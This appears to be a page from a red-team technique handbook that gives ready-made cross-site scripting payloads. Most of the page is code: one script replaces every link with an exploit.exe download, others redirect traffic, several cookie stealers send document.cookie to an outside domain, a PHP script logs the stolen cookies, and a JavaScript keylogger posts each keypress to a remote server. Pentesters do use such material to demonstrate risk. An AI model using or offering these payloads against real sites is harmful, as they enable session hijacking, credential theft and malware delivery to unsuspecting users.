Gibson> Download Garbage
  • Statement of purpose
  • Techniques
    • Intelligence Gathering
      • O365 Tenant ID
      • Internal domain enumeration
      • O365 email enumeration
      • Passive nmap (smap)
      • Large IP list handling
      • Host Enumeration
    • Initial Access
      • Mail scanning
      • VBA
    • Execution
      • DLL Hijacking
      • Windows LOLBINS
        • DLLs - LOLBIN Execution
        • Executables - LOLBIN Execution
        • Scripts - LOLBIN Execution
    • Privilege Escalation
      • Windows
        • Initial Enumeration
      • Linux
    • Defense Evasion
      • Clear windows event logs
      • Bypassing proxies and firewalls
      • Microsoft Windows Defender
    • Credential Access
      • Extract credentials from LSASS dump
      • Extract credentials from registry hives
      • LSA secrets extraction
      • Dumping LSASS.exe
      • Dumping registry hives
      • Dump the domain (Domain Controllers)
      • Browser cookies & passwords
      • Wi-Fi passwords
      • Clipboard
    • Infrastructure
    • Web application testing
      • XSS - Cross site scripting
        • Weaponising XSS
    • Other
      • Buffer Overflow resources
        • Buffer Overflow Python Template
        • Buffer Overflow Python Fuzzer
      • C Reverse Shell
      • Creating Tiered Storage in Windows 10
      • Default Credentials
    • Red Team Infrastructure
      • Cobalt Strike Team Server
      • Pre-redirector (free domains!)
      • HTTPS Redirector
      • Multi functional WebApp
      • Malleable C2 profiles
      • Gophish Docker reverse proxy
    • Malware
  • Tools
    • Tools
Powered by GitBook
On this page
  • Content substitution
  • Replace Link
  • Replace HTML element
  • Forward traffic
  • Data Exfiltration
  • Cookie stealers
  • Key logger

Was this helpful?

  1. Techniques
  2. Web application testing
  3. XSS - Cross site scripting

Weaponising XSS

1-up your <script>alert(1)</script> and effectively demonstrate risk

Content substitution

Replace Link

Replace all links on the page with your link

for (var i = 0; i < document.links.length; i++) {
  var a = document.links[i];
  a.href = 'https://domain.com/exploit.exe';
}

Replace HTML element

Replace HTML elements wwith your custom content using Element.innerHTML function. Example below replaces entire body element.

document.body.innerHTML = 'New body HTML';

Forward traffic

Simply forward traffic to your own site

location.replace("https://domain.com")
Example use in "input" field
onfocus=location.replace("https://domain.com") autofocus=a

Data Exfiltration

Cookie stealers

Simple cookie stealers

document.location cookie stealer

<script type="text/javascript">
document.location='https://domain.com/cookiestealer.php?c='+document.cookie;
</script>

img src cookie stealer

<script type="text/javascript">
<img src=x onerror=this.src='https://domain.com/?c='+document.cookie>
</script>

PHP Server to cache cookies

<?php
header ('Location: https://redirect-domain.com');
    $cookies = $_GET["c"];
    $file = fopen('cookielog.txt, 'a');
    fwrite($file, $cookies . "\n\n\n");
?>

Javascript cookie stealer (could be paired with keylogger below)

Multiple methods have been included below for exfiltration, choose only one

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

var CookieExfil = function () {}
var c = document.cookie
//Include one of the three exfil methods below:
//GET request - AJAX
var i = new Image()
ajaxRequest('GET', 'https://domain.com?c=' + encodeURIComponent(c), undefined, CookieExfil)

//GET request DOM
var i = new Image()
i.src = 'https://domain.com?c=' + encodeURIComponent(c)
CookieExfil()

//POST request - AJAX
ajaxRequest('POST', 'https://domain.com', 'cookie=' + encodeURIComponent(c), CookieExfil)

Key logger

Log keystrokes made to attackers remote server

function ajaxRequest (method, url, data, ad) {
  var xmlHttp = new XMLHttpRequest()

  if (xmlHttp.overrideMimeType) {
    xmlHttp.overrideMimeType('text/plain; charset=x-user-defined')
  }

  xmlHttp.open(method, url, true)

  if (ad) {
    xmlHttp.onreadystatechange = function () {
      if (xmlHttp.readyState === 4) {
        ad(xmlHttp)
      }
    }
  }

  xmlHttp.send(data)
  return xmlHttp
}

document.addEventListener('keypress', function (e) {
  ajaxRequest('POST', 'https://domain.com/Log', 'key=' + e.key)
})

PreviousXSS - Cross site scriptingNextOther

Last updated 4 years ago

Was this helpful?